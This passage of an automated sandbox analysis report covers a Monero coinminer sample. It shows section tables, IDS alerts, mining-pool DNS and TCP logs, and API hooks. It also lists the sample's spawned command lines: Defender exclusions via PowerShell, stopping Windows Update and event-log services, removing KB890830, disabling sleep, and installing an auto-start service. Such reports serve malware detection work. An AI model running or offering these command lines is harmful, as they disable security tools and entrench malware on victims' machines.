                                                      .pdata | 0x53c000 | 0x18c | 0x200 | c6f0c6a1728e01804deb81d27e63a128 | False | 0.513671875 | data | 3.192886865202075 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .00cfg | 0x53d000 | 0x10 | 0x200 | b18c7380298e104adf73576fa46bccc1 | False | 0.04296875 | data | 0.15127132530476972 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .tls | 0x53e000 | 0x10 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .reloc | 0x53f000 | 0x80 | 0x200 | ac63a5c750fa0a7b812d69f394edeba3 | False | 0.2421875 | data | 1.4604375773007994 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                      DLL | Import
                                                      ----|-------
                                                      msvcrt.dll | __C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, signal, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp, wcsstr
                                                      KERNEL32.dll | DeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery
                                                      Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                      ----------|-----|-----------|----------|-----------|-------------|---------|-----------|---------
                                                      2025-01-07T16:09:59.175553+0100 | 2826930 | ETPRO COINMINER XMR CoinMiner Usage | 2 | 192.168.2.9 | 49708 | 80.240.16.67 | 8888 | TCP
                                                      2025-01-07T16:10:22.405902+0100 | 2036289 | ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) | 2 | 192.168.2.9 | 65188 | 1.1.1.1 | 53 | UDP
                                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                      ----------|-------------|-----------|-----------|--------
                                                      Jan 7, 2025 16:10:22.419871092 CET | 49708 | 8888 | 192.168.2.9 | 80.240.16.67
                                                      Jan 7, 2025 16:10:22.424715042 CET | 8888 | 49708 | 80.240.16.67 | 192.168.2.9
                                                      Jan 7, 2025 16:10:22.424802065 CET | 49708 | 8888 | 192.168.2.9 | 80.240.16.67
                                                      Jan 7, 2025 16:10:22.424928904 CET | 49708 | 8888 | 192.168.2.9 | 80.240.16.67
                                                      Jan 7, 2025 16:10:22.429735899 CET | 8888 | 49708 | 80.240.16.67 | 192.168.2.9
                                                      Jan 7, 2025 16:10:23.076263905 CET | 8888 | 49708 | 80.240.16.67 | 192.168.2.9
                                                      Jan 7, 2025 16:10:23.116621971 CET | 49708 | 8888 | 192.168.2.9 | 80.240.16.67
                                                      Jan 7, 2025 16:10:41.846533060 CET | 8888 | 49708 | 80.240.16.67 | 192.168.2.9
                                                      Jan 7, 2025 16:10:41.898416042 CET | 49708 | 8888 | 192.168.2.9 | 80.240.16.67
                                                      Jan 7, 2025 16:11:03.664282084 CET | 8888 | 49708 | 80.240.16.67 | 192.168.2.9
                                                      Jan 7, 2025 16:11:03.819396019 CET | 49708 | 8888 | 192.168.2.9 | 80.240.16.67
                                                      Jan 7, 2025 16:11:25.713701010 CET | 8888 | 49708 | 80.240.16.67 | 192.168.2.9
                                                      Jan 7, 2025 16:11:25.835468054 CET | 49708 | 8888 | 192.168.2.9 | 80.240.16.67
                                                      Jan 7, 2025 16:11:47.718444109 CET | 8888 | 49708 | 80.240.16.67 | 192.168.2.9
                                                      Jan 7, 2025 16:11:47.929195881 CET | 49708 | 8888 | 192.168.2.9 | 80.240.16.67
                                                      Jan 7, 2025 16:12:01.109510899 CET | 8888 | 49708 | 80.240.16.67 | 192.168.2.9
                                                      Jan 7, 2025 16:12:01.241816998 CET | 49708 | 8888 | 192.168.2.9 | 80.240.16.67
                                                      Jan 7, 2025 16:12:09.759366989 CET | 8888 | 49708 | 80.240.16.67 | 192.168.2.9
                                                      Jan 7, 2025 16:12:09.929368973 CET | 49708 | 8888 | 192.168.2.9 | 80.240.16.67
                                                      Jan 7, 2025 16:12:31.696337938 CET | 8888 | 49708 | 80.240.16.67 | 192.168.2.9
                                                      Jan 7, 2025 16:12:31.741714001 CET | 49708 | 8888 | 192.168.2.9 | 80.240.16.67
                                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                      ----------|-------------|-----------|-----------|--------
                                                      Jan 7, 2025 16:10:22.405901909 CET | 65188 | 53 | 192.168.2.9 | 1.1.1.1
                                                      Jan 7, 2025 16:10:22.413194895 CET | 53 | 65188 | 1.1.1.1 | 192.168.2.9
                                                      Jan 7, 2025 16:10:23.761193037 CET | 62592 | 53 | 192.168.2.9 | 1.1.1.1
                                                      Jan 7, 2025 16:10:23.791937113 CET | 53 | 62592 | 1.1.1.1 | 192.168.2.9
                                                      Jan 7, 2025 16:11:21.944704056 CET | 59822 | 53 | 192.168.2.9 | 1.1.1.1
                                                      Jan 7, 2025 16:11:21.975595951 CET | 53 | 59822 | 1.1.1.1 | 192.168.2.9
                                                      Jan 7, 2025 16:12:27.534051895 CET | 61404 | 53 | 192.168.2.9 | 1.1.1.1
                                                      Jan 7, 2025 16:12:27.565321922 CET | 53 | 61404 | 1.1.1.1 | 192.168.2.9
                                                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                      ----------|-----------|---------|----------|---------|------|------|-------|---------------
                                                      Jan 7, 2025 16:10:22.405901909 CET | 192.168.2.9 | 1.1.1.1 | 0x380 | Standard query (0) | pool.hashvault.pro | A (IP address) | IN (0x0001) | false
                                                      Jan 7, 2025 16:10:23.761193037 CET | 192.168.2.9 | 1.1.1.1 | 0x85d4 | Standard query (0) | miners20002.com | A (IP address) | IN (0x0001) | false
                                                      Jan 7, 2025 16:11:21.944704056 CET | 192.168.2.9 | 1.1.1.1 | 0x99a5 | Standard query (0) | miners20002.com | A (IP address) | IN (0x0001) | false
                                                      Jan 7, 2025 16:12:27.534051895 CET | 192.168.2.9 | 1.1.1.1 | 0x1b1d | Standard query (0) | miners20002.com | A (IP address) | IN (0x0001) | false
                                                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                      ----------|-----------|---------|----------|------------|------|-------|---------|------|-------|---------------
                                                      Jan 7, 2025 16:10:22.413194895 CET | 1.1.1.1 | 192.168.2.9 | 0x380 | No error (0) | pool.hashvault.pro | | 80.240.16.67 | A (IP address) | IN (0x0001) | false
                                                      Jan 7, 2025 16:10:22.413194895 CET | 1.1.1.1 | 192.168.2.9 | 0x380 | No error (0) | pool.hashvault.pro | | 192.248.189.11 | A (IP address) | IN (0x0001) | false
                                                      Jan 7, 2025 16:10:23.791937113 CET | 1.1.1.1 | 192.168.2.9 | 0x85d4 | Name error (3) | miners20002.com | none | none | A (IP address) | IN (0x0001) | false
                                                      Jan 7, 2025 16:11:21.975595951 CET | 1.1.1.1 | 192.168.2.9 | 0x99a5 | Name error (3) | miners20002.com | none | none | A (IP address) | IN (0x0001) | false
                                                      Jan 7, 2025 16:12:27.565321922 CET | 1.1.1.1 | 192.168.2.9 | 0x1b1d | Name error (3) | miners20002.com | none | none | A (IP address) | IN (0x0001) | false

                                                      Code Manipulations

                                                      Function Name                 | Hook Type | Active in Processes
                                                      ------------------------------|-----------|--------------------------
                                                      ZwEnumerateKey                | INLINE    | explorer.exe, winlogon.exe
                                                      NtQuerySystemInformation      | INLINE    | explorer.exe, winlogon.exe
                                                      ZwResumeThread                | INLINE    | explorer.exe, winlogon.exe
                                                      NtDeviceIoControlFile         | INLINE    | explorer.exe, winlogon.exe
                                                      ZwDeviceIoControlFile         | INLINE    | explorer.exe, winlogon.exe
                                                      NtEnumerateKey                | INLINE    | explorer.exe, winlogon.exe
                                                      NtQueryDirectoryFile          | INLINE    | explorer.exe, winlogon.exe
                                                      ZwEnumerateValueKey           | INLINE    | explorer.exe, winlogon.exe
                                                      ZwQuerySystemInformation      | INLINE    | explorer.exe, winlogon.exe
                                                      NtResumeThread                | INLINE    | explorer.exe, winlogon.exe
                                                      RtlGetNativeSystemInformation | INLINE    | explorer.exe, winlogon.exe
                                                      NtQueryDirectoryFileEx        | INLINE    | explorer.exe, winlogon.exe
                                                      NtEnumerateValueKey           | INLINE    | explorer.exe, winlogon.exe
                                                      ZwQueryDirectoryFileEx        | INLINE    | explorer.exe, winlogon.exe
                                                      ZwQueryDirectoryFile          | INLINE    | explorer.exe, winlogon.exe
                                                      Function Name                 | Hook Type | New Data
                                                      ------------------------------|-----------|------------------------------
                                                      ZwEnumerateKey                | INLINE    | 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                      NtQuerySystemInformation      | INLINE    | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                      ZwResumeThread                | INLINE    | 0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                      NtDeviceIoControlFile         | INLINE    | 0xE9 0x90 0x03 0x33 0x34 0x4F
                                                      ZwDeviceIoControlFile         | INLINE    | 0xE9 0x90 0x03 0x33 0x34 0x4F
                                                      NtEnumerateKey                | INLINE    | 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                      NtQueryDirectoryFile          | INLINE    | 0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                      ZwEnumerateValueKey           | INLINE    | 0xE9 0x90 0x03 0x33 0x31 0x1F
                                                      ZwQuerySystemInformation      | INLINE    | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                      NtResumeThread                | INLINE    | 0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                      RtlGetNativeSystemInformation | INLINE    | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                      NtQueryDirectoryFileEx        | INLINE    | 0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                      NtEnumerateValueKey           | INLINE    | 0xE9 0x90 0x03 0x33 0x31 0x1F
                                                      ZwQueryDirectoryFileEx        | INLINE    | 0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                      ZwQueryDirectoryFile          | INLINE    | 0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                      Target ID:0
                                                      Start time:10:10:04
                                                      Start date:07/01/2025
                                                      Path:C:\Users\user\Desktop\xmr new.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\user\Desktop\xmr new.exe"
                                                      Imagebase:0x7ff641dc0000
                                                      File size:5'471'744 bytes
                                                      MD5 hash:7D6398EBFB82A24748617189BF4AD691
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:2
                                                      Start time:10:10:04
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                      Imagebase:0x7ff760310000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:3
                                                      Start time:10:10:04
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:5
                                                      Start time:10:10:16
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                      Imagebase:0x7ff7f4b70000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:6
                                                      Start time:10:10:16
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                      Imagebase:0x7ff61f410000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:7
                                                      Start time:10:10:16
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:8
                                                      Start time:10:10:16
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:9
                                                      Start time:10:10:16
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\wusa.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                      Imagebase:0x7ff621dd0000
                                                      File size:345'088 bytes
                                                      MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:10
                                                      Start time:10:10:16
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                      Imagebase:0x7ff61f410000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:11
                                                      Start time:10:10:16
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:12
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                      Imagebase:0x7ff61f410000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:13
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:14
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop bits
                                                      Imagebase:0x7ff61f410000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:15
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:16
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                      Imagebase:0x7ff61f410000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:17
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:18
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                      Imagebase:0x7ff728960000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:19
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                      Imagebase:0x7ff728960000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:20
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:21
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                      Imagebase:0x7ff728960000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:22
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:23
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                      Imagebase:0x7ff728960000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:24
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:25
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\dialer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\dialer.exe
                                                      Imagebase:0x7ff6ae8e0000
                                                      File size:39'936 bytes
                                                      MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:26
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:27
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe delete "CKTJZLMO"
                                                      Imagebase:0x7ff61f410000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:28
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:29
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto"
                                                      Imagebase:0x7ff61f410000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:30
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:31
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\winlogon.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:winlogon.exe
                                                      Imagebase:0x7ff7f7550000
                                                      File size:906'240 bytes
                                                      MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:32
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                      Imagebase:0x7ff61f410000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:33
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe start "CKTJZLMO"
                                                      Imagebase:0x7ff61f410000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:34
                                                      Start time:10:10:18
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:35
                                                      Start time:10:10:18
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:36
                                                      Start time:10:10:18
                                                      Start date:07/01/2025
                                                      Path:C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe
                                                      Imagebase:0x7ff752d50000
                                                      File size:5'471'744 bytes
                                                      MD5 hash:7D6398EBFB82A24748617189BF4AD691
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 74%, ReversingLabs
                                                      Has exited:true

                                                      Target ID:37
                                                      Start time:10:10:18
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\lsass.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\lsass.exe
                                                      Imagebase:0x7ff7bf4f0000
                                                      File size:59'456 bytes
                                                      MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:38
                                                      Start time:10:10:18
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                      Imagebase:0x7ff760310000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:39
                                                      Start time:10:10:18
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
